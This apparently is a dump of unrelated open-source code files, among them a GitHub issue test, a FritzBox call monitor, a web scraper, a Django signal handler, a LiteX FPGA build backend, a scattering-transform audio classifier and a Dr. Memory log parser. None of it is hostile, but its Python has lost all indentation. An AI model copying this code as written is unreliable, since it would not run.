author_association=GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
comments=[
IssueCommentMeta(user="AwesomeCommentor",
author_association=
GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
user_type="User")
],
user="AwesomeAuthor")
self.assertEqual(GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
issue.last_commenter_type)
def test_issue_to_dict(self):
"""Tests converting to dict."""
issue = IssueMeta(title="Awesome issue",
number=42,
state="open",
assignee="AwesomePerson",
author_association=GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
comments=[
IssueCommentMeta(user="AwesomeCommentor",
author_association=
GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
user_type="User")
],
user="AwesomeAuthor")
reference_dict = {
'assignee': 'AwesomePerson',
'author_association': 'FIRST_TIME_CONTRIBUTOR',
'days_since_create_date': 0,
'days_since_last_member_comment': None,
'days_since_last_update': 0,
'days_since_last_user_comment': 0,
'is_authored_by_or_last_commented_by_community': True,
'labels': [],
'last_commented_by': 'AwesomeCommentor',
'last_commenter_type': 'FIRST_TIME_CONTRIBUTOR',
'number': 42,
'pull_request': None,
'state': 'open',
'title': 'Awesome issue',
'user': 'AwesomeAuthor'
}
self.assertEqual(issue.to_dict(), reference_dict)
| StarcoderdataPython |
3453184 | """
Module to inspect phone-call events in real time.
This is the command line interface for the core.fritzmonitor module
and should serve as an example how to use an instance of FritzMonitor.
To run this, the CallMonitor service of the box has to be activated.
This can be done with any registered Phone by typing the following codes:
activate: #96*5*
deactivate: #96*4*
"""
# This module is part of the FritzConnection package.
# https://github.com/kbr/fritzconnection
# License: MIT (https://opensource.org/licenses/MIT)
# Author: <NAME>
import argparse
import queue
from ..core.fritzmonitor import (
FritzMonitor,
FRITZ_IP_ADDRESS,
FRITZ_MONITOR_SOCKET_TIMEOUT,
)
from .. import __version__
HEALTHCHECK_TIMEOUT = 10
def print_header(args):
print(f"\nfritzconnection v{__version__}")
print(f"start fritzmonitor on address: {args.address}")
print(f"settings for socket-timeout: {args.timeout} [sec]")
print(f"settings for healthcheck-timeout: {args.healthcheck} [sec]")
print("(to stop press ^C)\n")
def get_cli_arguments():
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--ip-address",
nargs="?",
default=FRITZ_IP_ADDRESS,
const=None,
dest="address",
help="Specify ip-address of the FritzBox to connect to."
"Default: %s" % FRITZ_IP_ADDRESS,
)
parser.add_argument(
"-t",
"--timeout",
nargs="?",
type=int,
default=FRITZ_MONITOR_SOCKET_TIMEOUT,
const=None,
dest="timeout",
help="Setting for socket timeout [sec]."
"Default: %s" % FRITZ_MONITOR_SOCKET_TIMEOUT,
)
parser.add_argument(
"-c",
"--healthcheck",
nargs="?",
type=int,
default=HEALTHCHECK_TIMEOUT,
const=None,
dest="healthcheck",
help="Setting for internal health-check interval [sec]."
"Default: %s" % HEALTHCHECK_TIMEOUT,
)
args = parser.parse_args()
return args
def process_events(monitor, event_queue, healthcheck_interval):
while True:
try:
event = event_queue.get(timeout=healthcheck_interval)
except queue.Empty:
# check health:
if not monitor.is_alive:
raise OSError("Error: fritzmonitor connection failed")
else:
# do event processing here:
print(event)
def main():
"""
Entry point: example to use FritzMonitor.
"""
args = get_cli_arguments()
print_header(args)
# create a FritzMonitor instance and get the event_queue by calling start().
# start() returns the queue for the events.
try:
with FritzMonitor(address=args.address, timeout=args.timeout) as monitor:
event_queue = monitor.start()
process_events(monitor, event_queue, healthcheck_interval=args.healthcheck)
except (OSError, KeyboardInterrupt) as err:
print(err)
print("exit fritzmonitor")
if __name__ == "__main__":
main()
| StarcoderdataPython |
3301954 | <filename>tools/iotjs-create-module.py
#!/usr/bin/env python
# Copyright 2018-present Samsung Electronics Co., Ltd. and other contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
IOTJS_BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
TEMPLATE_BASE_DIR = os.path.join(os.path.dirname(__file__), 'module_templates')
MODULE_NAME_RE = r"^[a-z0-9][a-z0-9\._]*$"
def load_templates(template_dir):
for root, dirs, files in os.walk(template_dir):
for fp in files:
yield os.path.relpath(os.path.join(root, fp), template_dir)
def replace_contents(input_file, module_name):
with open(input_file) as fp:
data = fp.read()
data = data.replace("$MODULE_NAME$", module_name)
data = data.replace("$IOTJS_PATH$", IOTJS_BASE_DIR)
return data
def create_module(output_dir, module_name, template_dir, template_files):
module_path = os.path.join(output_dir, module_name)
print("Creating module in {}".format(module_path))
if os.path.exists(module_path):
print("Module path ({}) already exists! Exiting".format(module_path))
return False
for file_name in template_files:
file_path = os.path.join(template_dir, file_name)
print("loading template file: {}".format(file_path))
contents = replace_contents(file_path, module_name)
output_path = os.path.join(module_path, file_name)
# create sub-dir if required
base_dir = os.path.dirname(output_path)
if not os.path.exists(base_dir):
os.mkdir(base_dir)
with open(output_path, "w") as fp:
fp.write(contents)
return True
def valid_module_name(value):
if not re.match(MODULE_NAME_RE, value):
msg = "Invalid module name, should match regexp: %s" % MODULE_NAME_RE
raise argparse.ArgumentTypeError(msg)
return value
if __name__ == "__main__":
import argparse
import sys
desc = "Create an IoT.js external module using a template"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("module_name", metavar="<MODULE NAME>", nargs=1,
type=valid_module_name,
help="name of the new module ((must be in lowercase " +
"and should match regexp: %s)" % MODULE_NAME_RE)
parser.add_argument("--path", default=".",
help="directory where the module will be created " +
"(default: %(default)s)")
parser.add_argument("--template", default="basic",
choices=["basic", "shared"],
help="type of the template which should be used "
"(default: %(default)s)")
args = parser.parse_args()
template_dir = os.path.join(TEMPLATE_BASE_DIR,
"%s_module_template" % args.template)
template_files = load_templates(template_dir)
created = create_module(args.path,
args.module_name[0],
template_dir,
template_files)
if created:
module_path = os.path.join(args.path, args.module_name[0])
print("Module created in: {}".format(os.path.abspath(module_path)))
| StarcoderdataPython |
1847010 | from selenium import webdriver
from bs4 import BeautifulSoup
import time
import csv
import requests
START_URL = "https://exoplanets.nasa.gov/exoplanet-catalog/"
browser = webdriver.Chrome("C:/Users/letsg/OneDrive/Desktop/Scraper-master/Scraper-master/chromedriver.exe")
browser.get(START_URL)
time.sleep(10)
headers = ["name", "light_years_from_earth", "planet_mass", "stellar_magnitude", "discovery_date", "hyperlink", "planet_type", "planet_radius", "orbital_radius", "orbital_period", "eccentricity"]
# Collected rows; kept at module scope because they are also used after scrape() returns.
planet_data = []
new_planet_data = []

def scrape():
for i in range(0, 428):
soup = BeautifulSoup(browser.page_source, "html.parser")
for ul_tag in soup.find_all("ul", attrs={"class", "exoplanet"}):
li_tags = ul_tag.find_all("li")
temp_list = []
for index, li_tag in enumerate(li_tags):
if index == 0:
temp_list.append(li_tag.find_all("a")[0].contents[0])
else:
try:
temp_list.append(li_tag.contents[0])
except:
temp_list.append("")
hyperlink_li_tag=li_tags[0]
temp_list.append("https://exoplanets.nasa.gov"+hyperlink_li_tag.find_all("a",href=True)[0]["href"])
planet_data.append(temp_list)
browser.find_element_by_xpath('//*[@id="primary_column"]/footer/div/div/div/nav/span[2]/a').click()
def scrap_more_data(hyperlink):
page=requests.get(hyperlink)
soup = BeautifulSoup(page.content,"html.parser")
for tr_tag in soup.find_all("tr",attrs={"class":"fact_row"}):
td_tags=tr_tag.find_all("td")
temp_list=[]
for td_tag in td_tags:
try:
temp_list.append(td_tag.find_all("div",attrs={"class":"value"})[0].contents[0])
except:
temp_list.append("")
new_planet_data.append(temp_list)
scrape()
for data in planet_data:
scrap_more_data(data[5])
final_planet_data=[]
for index,data in enumerate(planet_data):
    final_planet_data.append(data + new_planet_data[index])
with open("final_csv", "w") as f:
csvwriter = csv.writer(f)
csvwriter.writerow(headers)
csvwriter.writerows(final_planet_data) | StarcoderdataPython |
90928 |
import numpy as np
def unflatten(w, weights):
sizes = [x.size for x in weights]
split_idx = np.cumsum(sizes)
update_ravelled = np.split(w, split_idx)[:-1]
shapes = [x.shape for x in weights]
update_list = [np.reshape(u, s) for s, u in zip(shapes, update_ravelled)]
return update_list
def flatten_update(update):
return np.concatenate([x.ravel() for x in update]) | StarcoderdataPython |
1837019 | <reponame>iwanimsand/pyPS4Controller<filename>pyPS4Controller/__main__.py
from pyPS4Controller.cli import Cli
def main():
Cli()
| StarcoderdataPython |
394041 | from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template.loader import get_template
from django.conf import settings
from functools import wraps
from .models import Product
def disable_for_loaddata(signal_handler):
"""
Decorator that turns off signal handlers when loading fixture data.
"""
@wraps(signal_handler)
def wrapper(*args, **kwargs):
if kwargs.get("raw"):
return
signal_handler(*args, **kwargs)
return wrapper
@receiver(post_save, sender=Product)
@disable_for_loaddata
def post_save_product(sender, instance, **kwargs):
"""
Notify all other admins about the change, either via email or other mechanism.
"""
# Find staff users's emails
to_users = [user.email for user in User.objects.filter(is_staff=True) if user.email]
# Send email to users
body_plain = get_template("email.txt")
body_html = get_template("email.html")
context = {
"sku": instance.sku,
"name": instance.name,
"price": instance.price,
"brand": instance.brand,
"sender": settings.DEFAULT_FROM_EMAIL,
}
send_mail(
"Product has changed",
body_plain.render(context),
settings.DEFAULT_FROM_EMAIL,
to_users,
html_message=body_html.render(context),
fail_silently=False,
)
| StarcoderdataPython |
1947769 | <filename>litex/build/xilinx/yosys_nextpnr.py
#
# This file is part of LiteX.
#
# Copyright (c) 2020 Antmicro <www.antmicro.com>
# Copyright (c) 2020 <NAME> <<EMAIL>>
# Copyright (c) 2022 <NAME> <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
import os
import subprocess
import sys
import math
from typing import NamedTuple, Union, List
import re
from shutil import which
from migen.fhdl.structure import _Fragment, wrap, Constant
from migen.fhdl.specials import Instance
from litex.build.generic_platform import *
from litex.build.xilinx.vivado import _xdc_separator, _format_xdc, _build_xdc
from litex.build import tools
from litex.build.xilinx import common
def _unwrap(value):
return value.value if isinstance(value, Constant) else value
# Makefile -----------------------------------------------------------------------------------------
class _MakefileGenerator:
class Var(NamedTuple):
name: str
value: Union[str, List[str]] = ""
class Rule(NamedTuple):
target: str
prerequisites: List[str] = []
commands: List[str] = []
phony: bool = False
def __init__(self, ast):
self.ast = ast
def generate(self):
makefile = []
for entry in self.ast:
if isinstance(entry, str):
makefile.append(entry)
elif isinstance(entry, self.Var):
if not entry.value:
makefile.append(f"{entry.name} :=")
elif isinstance(entry.value, list):
indent = " " * (len(entry.name) + len(" := "))
line = f"{entry.name} := {entry.value[0]}"
for value in entry.value[1:]:
line += " \\"
makefile.append(line)
line = indent + value
makefile.append(line)
elif isinstance(entry.value, str):
makefile.append(f"{entry.name} := {entry.value}")
else:
raise
elif isinstance(entry, self.Rule):
makefile.append("")
if entry.phony:
makefile.append(f".PHONY: {entry.target}")
makefile.append(" ".join([f"{entry.target}:", *entry.prerequisites]))
for cmd in entry.commands:
makefile.append(f"\t{cmd}")
return "\n".join(makefile)
def _run_make():
make_cmd = ["make", "-j1"]
if which("nextpnr-xilinx") is None:
msg = "Unable to find Yosys+Nextpnr toolchain, please:\n"
msg += "- Add Yosys and Nextpnr tools to your $PATH."
raise OSError(msg)
if tools.subprocess_call_filtered(make_cmd, common.colors) != 0:
raise OSError("Error occured during yosys or nextpnr script execution.")
# YosysNextpnrToolchain -------------------------------------------------------------------------------
class YosysNextpnrToolchain:
attr_translate = {
#"keep": ("dont_touch", "true"),
#"no_retiming": ("dont_touch", "true"),
#"async_reg": ("async_reg", "true"),
#"mr_ff": ("mr_ff", "true"), # user-defined attribute
#"ars_ff1": ("ars_ff1", "true"), # user-defined attribute
#"ars_ff2": ("ars_ff2", "true"), # user-defined attribute
#"no_shreg_extract": None
}
def __init__(self):
self.clocks = dict()
self.false_paths = set()
self.symbiflow_device = None
self.bitstream_device = None
self._partname = None
def _check_properties(self, platform):
if not self.symbiflow_device:
try:
self.symbiflow_device = {
# FIXME: fine for now since only a few devices are supported, do more clever device re-mapping.
"xc7a35ticsg324-1L" : "xc7a35t",
"xc7a100tcsg324-1" : "xc7a35t",
"xc7z010clg400-1" : "xc7z010",
"xc7z020clg400-1" : "xc7z020",
}[platform.device]
except KeyError:
raise ValueError(f"symbiflow_device is not specified")
if not self.bitstream_device:
try:
# bitstream_device points to a directory in prjxray database
# available bitstream_devices: artix7, kintex7, zynq7
self.bitstream_device = {
"xc7a": "artix7", # xc7a35t, xc7a50t, xc7a100t, xc7a200t
"xc7z": "zynq7", # xc7z010, xc7z020
}[platform.device[:4]]
except KeyError:
raise ValueError(f"Unsupported device: {platform.device}")
# FIXME: prjxray-db doesn't have xc7a35ticsg324-1L - use closest replacement
self._partname = {
"xc7a35ticsg324-1L" : "xc7a35tcsg324-1",
"xc7a100tcsg324-1" : "xc7a100tcsg324-1",
"xc7a200t-sbg484-1" : "xc7a200tsbg484-1",
"xc7z010clg400-1" : "xc7z010clg400-1",
"xc7z020clg400-1" : "xc7z020clg400-1",
}.get(platform.device, platform.device)
def _generate_makefile(self, platform, build_name):
Var = _MakefileGenerator.Var
Rule = _MakefileGenerator.Rule
makefile = _MakefileGenerator([
"# Autogenerated by LiteX / git: " + tools.get_litex_git_revision() + "\n",
Var("TOP", build_name),
Var("PARTNAME", self._partname),
Var("DEVICE", self.symbiflow_device),
Var("BITSTREAM_DEVICE", self.bitstream_device),
"",
Var("DB_DIR", "/usr/share/nextpnr/prjxray-db"), #FIXME: resolve path
Var("CHIPDB_DIR", "/usr/share/nextpnr/xilinx-chipdb"), #FIXME: resolve path
"",
Var("VERILOG", [f for f,language,_ in platform.sources if language in ["verilog", "system_verilog"]]),
Var("MEM_INIT", [f"{name}" for name in os.listdir() if name.endswith(".init")]),
Var("SDC", f"{build_name}.sdc"),
Var("XDC", f"{build_name}.xdc"),
Var("ARTIFACTS", [
"$(TOP).fasm", "$(TOP).frames",
"*.bit", "*.fasm", "*.json", "*.log", "*.rpt",
"constraints.place"
]),
Rule("all", ["$(TOP).bit"], phony=True),
Rule("$(TOP).json", ["$(VERILOG)", "$(MEM_INIT)", "$(XDC)"], commands=[
#"symbiflow_synth -t $(TOP) -v $(VERILOG) -d $(BITSTREAM_DEVICE) -p $(PARTNAME) -x $(XDC) > /dev/null"
#yosys -p "synth_xilinx -flatten -abc9 -nosrl -noclkbuf -nodsp -iopad -nowidelut" #forum: symbiflow_synth
'yosys -p "synth_xilinx -flatten -abc9 -nobram -arch xc7 -top $(TOP); write_json $(TOP).json" $(VERILOG) > /dev/null'
]),
Rule("$(TOP).fasm", ["$(TOP).json"], commands=[
#"symbiflow_write_fasm -e $(TOP).eblif -d $(DEVICE) > /dev/null"
'nextpnr-xilinx --chipdb $(CHIPDB_DIR)/$(DEVICE).bin --xdc $(XDC) --json $(TOP).json --write $(TOP)_routed.json --fasm $(TOP).fasm > /dev/null'
]),
Rule("$(TOP).frames", ["$(TOP).fasm"], commands=[
'fasm2frames.py --part $(PARTNAME) --db-root $(DB_DIR)/$(BITSTREAM_DEVICE) $(TOP).fasm > $(TOP).frames'
]),
Rule("$(TOP).bit", ["$(TOP).frames"], commands=[
#"symbiflow_write_bitstream -d $(BITSTREAM_DEVICE) -f $(TOP).fasm -p $(PARTNAME) -b $(TOP).bit > /dev/null"
'xc7frames2bit --part_file $(DB_DIR)/$(BITSTREAM_DEVICE)/$(PARTNAME)/part.yaml --part_name $(PARTNAME) --frm_file $(TOP).frames --output_file $(TOP).bit > /dev/null'
]),
Rule("clean", phony=True, commands=[
"rm -f $(ARTIFACTS)"
]),
])
tools.write_to_file("Makefile", makefile.generate())
def _build_clock_constraints(self, platform):
platform.add_platform_command(_xdc_separator("Clock constraints"))
#for clk, period in sorted(self.clocks.items(), key=lambda x: x[0].duid):
# platform.add_platform_command(
# "create_clock -period " + str(period) +
# " {clk}", clk=clk)
pass #clock constraints not supported
def _fix_instance(self, instance):
pass
def build(self, platform, fragment,
build_dir = "build",
build_name = "top",
run = True,
enable_xpm = False,
**kwargs):
self._check_properties(platform)
# Create build directory
os.makedirs(build_dir, exist_ok=True)
cwd = os.getcwd()
os.chdir(build_dir)
# Finalize design
if not isinstance(fragment, _Fragment):
fragment = fragment.get_fragment()
platform.finalize(fragment)
# toolchain-specific fixes
for instance in fragment.specials:
if isinstance(instance, Instance):
self._fix_instance(instance)
# Generate timing constraints
self._build_clock_constraints(platform)
# Generate verilog
v_output = platform.get_verilog(fragment, name=build_name, **kwargs)
named_sc, named_pc = platform.resolve_signals(v_output.ns)
v_file = build_name + ".v"
v_output.write(v_file)
platform.add_source(v_file)
self._generate_makefile(
platform = platform,
build_name = build_name
)
# Generate design constraints
tools.write_to_file(build_name + ".xdc", _build_xdc(named_sc, named_pc))
if run:
_run_make()
os.chdir(cwd)
return v_output.ns
def add_period_constraint(self, platform, clk, period):
clk.attr.add("keep")
period = math.floor(period*1e3)/1e3 # round to lowest picosecond
if clk in self.clocks:
if period != self.clocks[clk]:
raise ValueError("Clock already constrained to {:.2f}ns, new constraint to {:.2f}ns"
.format(self.clocks[clk], period))
self.clocks[clk] = period
def add_false_path_constraint(self, platform, from_, to):
# FIXME: false path constraints are currently not supported by the symbiflow toolchain
return
def symbiflow_build_args(parser):
pass
def symbiflow_build_argdict(args):
return dict()
| StarcoderdataPython |
147282 | <gh_stars>100-1000
"""
Classification of spoken digit recordings
=========================================
In this example we use the 1D scattering transform to represent spoken digits,
which we then classify using a simple classifier. This shows that 1D scattering
representations are useful for this type of problem.
This dataset is automatically downloaded and preprocessed from
https://github.com/Jakobovski/free-spoken-digit-dataset.git
Downloading and precomputing scattering coefficients should take about 5 min.
Running the gradient descent takes about 1 min.
Results:
Training accuracy = 99.7%
Testing accuracy = 98.0%
"""
###############################################################################
# Preliminaries
# -------------
#
# Since we're using PyTorch to train the model, import `torch`.
import torch
###############################################################################
# We will be constructing a logistic regression classifier on top of the
# scattering coefficients, so we need some of the neural network tools from
# `torch.nn` and the Adam optimizer from `torch.optim`.
from torch.nn import Linear, NLLLoss, LogSoftmax, Sequential
from torch.optim import Adam
###############################################################################
# To handle audio file I/O, we import `os` and `scipy.io.wavfile`. We also need
# `numpy` for some basic array manipulation.
from scipy.io import wavfile
import os
import numpy as np
###############################################################################
# To evaluate our results, we need to form a confusion matrix using
# scikit-learn and display them using `matplotlib`.
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
###############################################################################
# Finally, we import the `Scattering1D` class from the `kymatio.torch` package
# and the `fetch_fsdd` function from `kymatio.datasets`. The `Scattering1D`
# class is what lets us calculate the scattering transform, while the
# `fetch_fsdd` function downloads the FSDD, if needed.
from kymatio.torch import Scattering1D
from kymatio.datasets import fetch_fsdd
###############################################################################
# Pipeline setup
# --------------
# We start by specifying the dimensions of our processing pipeline along with
# some other parameters.
#
# First, we have signal length. Longer signals are truncated and shorter
# signals are zero-padded. The sampling rate is 8000 Hz, so this corresponds to
# little over a second.
T = 2**13
###############################################################################
# Maximum scale 2**J of the scattering transform (here, about 30 milliseconds)
# and the number of wavelets per octave.
J = 8
Q = 12
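###############################################################################
# As a quick sanity check on the scale quoted above (an aside based on the
# 8000 Hz sampling rate mentioned earlier): 2**J = 256 samples, and
# 256 / 8000 Hz = 32 ms, i.e. roughly the "30 milliseconds" figure.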
###############################################################################
# We need a small constant to add to the scattering coefficients before
# computing the logarithm. This prevents very large values when the scattering
# coefficients are very close to zero.
log_eps = 1e-6
###############################################################################
# If a GPU is available, let's use it!
use_cuda = torch.cuda.is_available()
###############################################################################
# For reproducibility, we fix the seed of the random number generator.
torch.manual_seed(42)
###############################################################################
# Loading the data
# ----------------
# Once the parameters are set, we can start loading the data into a format that
# can be fed into the scattering transform and then a logistic regression
# classifier.
#
# We first download the dataset. If it's already downloaded, `fetch_fsdd` will
# simply return the information corresponding to the dataset that's already
# on disk.
info_data = fetch_fsdd()
files = info_data['files']
path_dataset = info_data['path_dataset']
###############################################################################
# Set up Tensors to hold the audio signals (`x_all`), the labels (`y_all`), and
# whether the signal is in the train or test set (`subset`).
x_all = torch.zeros(len(files), T, dtype=torch.float32)
y_all = torch.zeros(len(files), dtype=torch.int64)
subset = torch.zeros(len(files), dtype=torch.int64)
###############################################################################
# For each file in the dataset, we extract its label `y` and its index from the
# filename. If the index is between 0 and 4, it is placed in the test set, while
# files with larger indices are used for training. The actual signals are
# normalized to have maximum amplitude one, and are truncated or zero-padded
# to the desired length `T`. They are then stored in the `x_all` Tensor while
# their labels are in `y_all`.
for k, f in enumerate(files):
basename = f.split('.')[0]
# Get label (0-9) of recording.
y = int(basename.split('_')[0])
# Index larger than 5 gets assigned to training set.
if int(basename.split('_')[2]) >= 5:
subset[k] = 0
else:
subset[k] = 1
# Load the audio signal and normalize it.
_, x = wavfile.read(os.path.join(path_dataset, f))
x = np.asarray(x, dtype='float')
x /= np.max(np.abs(x))
# Convert from NumPy array to PyTorch Tensor.
x = torch.from_numpy(x)
# If it's too long, truncate it.
if x.numel() > T:
x = x[:T]
# If it's too short, zero-pad it.
start = (T - x.numel()) // 2
x_all[k,start:start + x.numel()] = x
y_all[k] = y
###############################################################################
# Log-scattering transform
# ------------------------
# We now create the `Scattering1D` object that will be used to calculate the
# scattering coefficients.
scattering = Scattering1D(J, T, Q)
###############################################################################
# If we are using CUDA, the scattering transform object must be transferred to
# the GPU by calling its `cuda()` method. The data is similarly transferred.
if use_cuda:
scattering.cuda()
x_all = x_all.cuda()
y_all = y_all.cuda()
###############################################################################
# Compute the scattering transform for all signals in the dataset.
Sx_all = scattering.forward(x_all)
###############################################################################
# Since it does not carry useful information, we remove the zeroth-order
# scattering coefficients, which are always placed in the first channel of
# the scattering Tensor.
Sx_all = Sx_all[:,1:,:]
###############################################################################
# To increase discriminability, we take the logarithm of the scattering
# coefficients (after adding a small constant to make sure nothing blows up
# when scattering coefficients are close to zero). This is known as the
# log-scattering transform.
Sx_all = torch.log(torch.abs(Sx_all) + log_eps)
###############################################################################
# Finally, we average along the last dimension (time) to get a time-shift
# invariant representation.
Sx_all = torch.mean(Sx_all, dim=-1)
###############################################################################
# Training the classifier
# -----------------------
# With the log-scattering coefficients in hand, we are ready to train our
# logistic regression classifier.
#
# First, we extract the training data (those for which `subset` equals `0`)
# and the associated labels.
Sx_tr, y_tr = Sx_all[subset == 0], y_all[subset == 0]
###############################################################################
# Standardize the data to have mean zero and unit variance. Note that we need
# to apply the same transformation to the test data later, so we save the
# mean and standard deviation Tensors.
mu_tr = Sx_tr.mean(dim=0)
std_tr = Sx_tr.std(dim=0)
Sx_tr = (Sx_tr - mu_tr) / std_tr
###############################################################################
# Here we define a logistic regression model using PyTorch. We train it using
# Adam with a negative log-likelihood loss.
num_input = Sx_tr.shape[-1]
num_classes = y_tr.cpu().unique().numel()
model = Sequential(Linear(num_input, num_classes), LogSoftmax(dim=1))
optimizer = Adam(model.parameters())
criterion = NLLLoss()
###############################################################################
# As before, if we're on a GPU, transfer the model and the loss function onto
# the device.
if use_cuda:
model = model.cuda()
criterion = criterion.cuda()
###############################################################################
# Before training the model, we set some parameters for the optimization
# procedure.
# Number of signals to use in each gradient descent step (batch).
batch_size = 32
# Number of epochs.
num_epochs = 50
# Learning rate for Adam.
lr = 1e-4
###############################################################################
# Given these parameters, we compute the total number of batches.
nsamples = Sx_tr.shape[0]
nbatches = nsamples // batch_size
###############################################################################
# Now we're ready to train the classifier.
for e in range(num_epochs):
# Randomly permute the data. If necessary, transfer the permutation to the
# GPU.
perm = torch.randperm(nsamples)
if use_cuda:
perm = perm.cuda()
# For each batch, calculate the gradient with respect to the loss and take
# one step.
for i in range(nbatches):
idx = perm[i * batch_size : (i+1) * batch_size]
model.zero_grad()
resp = model.forward(Sx_tr[idx])
loss = criterion(resp, y_tr[idx])
loss.backward()
optimizer.step()
# Calculate the response of the training data at the end of this epoch and
# the average loss.
resp = model.forward(Sx_tr)
avg_loss = criterion(resp, y_tr)
# Try predicting the classes of the signals in the training set and compute
# the accuracy.
y_hat = resp.argmax(dim=1)
accuracy = (y_tr == y_hat).float().mean()
print('Epoch {}, average loss = {:1.3f}, accuracy = {:1.3f}'.format(
e, avg_loss, accuracy))
###############################################################################
# Now that our network is trained, let's test it!
#
# First, we extract the test data (those for which `subset` equals `1`) and the
# associated labels.
Sx_te, y_te = Sx_all[subset == 1], y_all[subset == 1]
###############################################################################
# Use the mean and standard deviation calculated on the training data to
# standardize the testing data, as well.
Sx_te = (Sx_te - mu_tr) / std_tr
###############################################################################
# Calculate the response of the classifier on the test data and the resulting
# loss.
resp = model.forward(Sx_te)
avg_loss = criterion(resp, y_te)
# Try predicting the labels of the signals in the test data and compute the
# accuracy.
y_hat = resp.argmax(dim=1)
accu = (y_te == y_hat).float().mean()
print('TEST, average loss = {:1.3f}, accuracy = {:1.3f}'.format(
avg_loss, accu))
###############################################################################
# Plotting the classification accuracy as a confusion matrix
# ----------------------------------------------------------
# Let's see what the very few misclassified sounds get misclassified as. We
# will plot a confusion matrix which indicates in a 2D histogram how often
# one sample was mistaken for another (anything on the diagonal is correctly
# classified, anything off the diagonal is wrong).
predicted_categories = y_hat.cpu().numpy()
actual_categories = y_te.cpu().numpy()
confusion = confusion_matrix(actual_categories, predicted_categories)
plt.figure()
plt.imshow(confusion)
tick_locs = np.arange(10)
ticks = ['{}'.format(i) for i in range(10)]
plt.xticks(tick_locs, ticks)
plt.yticks(tick_locs, ticks)
plt.ylabel("True number")
plt.xlabel("Predicted number")
plt.show()
| StarcoderdataPython |
3458624 | <reponame>Gitman1989/chromium
#!/usr/bin/python
# Copyright (c) 2006-2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# drmemory_analyze.py
''' Given a Dr.Memory output file, parses errors and uniques them.'''
import logging
import optparse
import os
import re
import subprocess
import sys
import time
class _StackTraceLine(object):
def __init__(self, line, address, binary):
self.raw_line_ = line
self.address = address
self.binary = binary
def __str__(self):
return self.raw_line_
class DrMemoryAnalyze:
''' Given a set of Dr.Memory output files, parse all the errors out of
them, unique them and output the results.'''
def __init__(self, source_dir, files):
'''Reads in a set of files.
Args:
source_dir: Path to top of source tree for this build
files: A list of filenames.
'''
self.reports = []
self.used_suppressions = {}
for file in files:
self.ParseReportFile(file)
def ReadLine(self):
self.line_ = self.cur_fd_.readline()
self.stack_trace_line_ = None
def ReadSection(self):
FILE_PREFIXES_TO_CUT = [
"build\\src\\",
"crt_bld\\self_x86\\",
]
CUT_STACK_BELOW = ".*testing.*Test.*Run.*"
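    # ReadSection consumes one error report: it keeps reading until a blank
    # line, rewrites "system call" and "binary!function" frames into numbered
    # stack entries, strips the build-path prefixes listed above, and stops
    # once a frame matches CUT_STACK_BELOW (the gtest runner frames).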
result = [self.line_]
self.ReadLine()
cnt = 1
while len(self.line_.strip()) > 0:
tmp_line = self.line_
match_syscall = re.search("system call (.*)\n", tmp_line)
if match_syscall:
syscall_name = match_syscall.groups()[0]
result.append(" #%2i <sys.call> %s\n" % (cnt, syscall_name))
cnt = cnt + 1
self.ReadLine() # skip "<system call> line
self.ReadLine()
continue
# Dr. Memory sometimes prints adjacent malloc'ed regions next to the
# access address in the UNADDRESSABLE ACCESS reports like this:
# Note: next higher malloc: <address range>
# Note: prev lower malloc: <address range>
match_malloc_info = re.search("Note: .* malloc: 0x.*", tmp_line)
if match_malloc_info:
result.append(tmp_line)
self.ReadLine()
continue
match_binary_fname = re.search("(0x[0-9a-fA-F]+) <.*> (.*)!([^+]*)"
"(?:\+0x[0-9a-fA-F]+)?\n", tmp_line)
self.ReadLine()
match_src_line = re.search("\s*(.*):([0-9]+)(?:\+0x[0-9a-fA-F]+)?",
self.line_)
if match_src_line:
self.ReadLine()
if match_binary_fname:
pc, binary, fname = match_binary_fname.groups()
if re.search(CUT_STACK_BELOW, fname):
break
report_line = (" #%2i %s %-50s" % (cnt, pc, fname))
if not re.search("\.exe$", binary):
# Print the DLL name
report_line += " " + binary
src, lineno = match_src_line.groups()
if src != "??":
for pat in FILE_PREFIXES_TO_CUT:
idx = src.rfind(pat)
if idx != -1:
src = src[idx+len(pat):]
report_line += " " + src
if int(lineno) != 0:
report_line += ":%i" % int(lineno)
result.append(report_line + "\n")
cnt = cnt + 1
return result
def ParseReportFile(self, filename):
self.cur_fd_ = open(filename, 'r')
while True:
self.ReadLine()
if (self.line_ == ''):
break
if re.search("Grouping errors that", self.line_):
# DrMemory has finished working.
break
tmp = []
match = re.search("^Error #[0-9]+: (.*)", self.line_)
if match:
self.line_ = match.groups()[0].strip() + "\n"
tmp.extend(self.ReadSection())
self.reports.append(tmp)
elif self.line_.startswith("ASSERT FAILURE"):
self.reports.append(self.line_.strip())
self.cur_fd_.close()
def Report(self, check_sanity):
sys.stdout.flush()
#TODO(timurrrr): support positive tests / check_sanity==True
if len(self.reports) > 0:
logging.error("Found %i error reports" % len(self.reports))
for report_list in self.reports:
report = ''
for line in report_list:
report += str(line)
logging.error('\n' + report)
logging.error("Total: %i error reports" % len(self.reports))
return -1
logging.info("PASS: No error reports found")
return 0
if __name__ == '__main__':
'''For testing only. The DrMemoryAnalyze class should be imported instead.'''
retcode = 0
parser = optparse.OptionParser("usage: %prog [options] <files to analyze>")
parser.add_option("", "--source_dir",
help="path to top of source tree for this build"
"(used to normalize source paths in baseline)")
(options, args) = parser.parse_args()
if len(args) == 0:
parser.error("no filename specified")
filenames = args
